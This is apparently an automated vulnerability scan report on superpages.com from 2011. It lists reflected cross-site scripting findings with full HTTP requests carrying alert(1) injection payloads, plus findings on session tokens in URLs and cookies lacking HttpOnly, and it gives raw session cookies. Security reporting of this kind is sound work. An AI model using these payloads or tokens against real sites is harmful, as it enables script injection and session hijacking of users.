GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:03:55 GMT Content-Length: 57628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.15. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74692 Date: Thu, 03 Feb 2011 17:09:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
...[SNIP]... var hostServ = 'http://www.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:36 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:36GMT Content-Length: 59492 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:45 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:46GMT Content-Length: 58480 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y ...[SNIP]... <h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1> ...[SNIP]...
1.19. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:06 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:06GMT Content-Length: 59798 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i ...[SNIP]... <h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1> ...[SNIP]...
1.20. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:55 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:06:56GMT Content-Length: 60810 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/ Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:07 GMT Content-Length: 65808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
var remote_add = "REMOTE_ADDR=173.193.214.243"; var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '2118 ...[SNIP]...
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=143D8CEECE171005D85B3D31E8E959E2; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 115257 Date: Thu, 03 Feb 2011 17:05:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <div class="f11" ><a href="http://yellowpages.superpages.com/blog?EG=2&listingid=2118363360&origText=&badword=&type=add&bizurl=/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?dls=true&bizname=Ally+Bank+-+Money+Market+Funds&LID=La7vjc/xbLslZMK7ylYCgQ==&sessionid=1296748823650-www.superpages.com-30323935-794472" onClick="clickTrackUGC3('blogAdd', 'yp_profile');return true;">Add a Blog</a> ...[SNIP]...
3. Cookie without HttpOnly flag setpreviousnext There are 20 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/ Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:00:23 GMT Content-Length: 65780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coupons HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=935846B8705224F72C259EA0DCC18B40; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74624 Date: Thu, 03 Feb 2011 17:06:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mobile/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 302 Moved Temporarily Server: Unspecified Set-Cookie: JSESSIONID=61349948AB01600308944E0F8F10BD6E; Path=/prod Location: http://www.superpages.com/mobile/index Content-Type: text/html Content-Length: 0 Date: Thu, 03 Feb 2011 17:06:10 GMT Connection: close Set-Cookie: NSC_xxx-tqnpcjmf-dpn-80=ffffffff9482137a45525d5f4f58455e445a4a421570;expires=Thu, 03-Feb-2011 17:08:11 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:27 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:27 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/copyright.html HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:04 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:04 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/privacy.html HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:05 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bp/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:05:55 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:55 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bp/US/javascript:%20return%20validate() HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:37 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
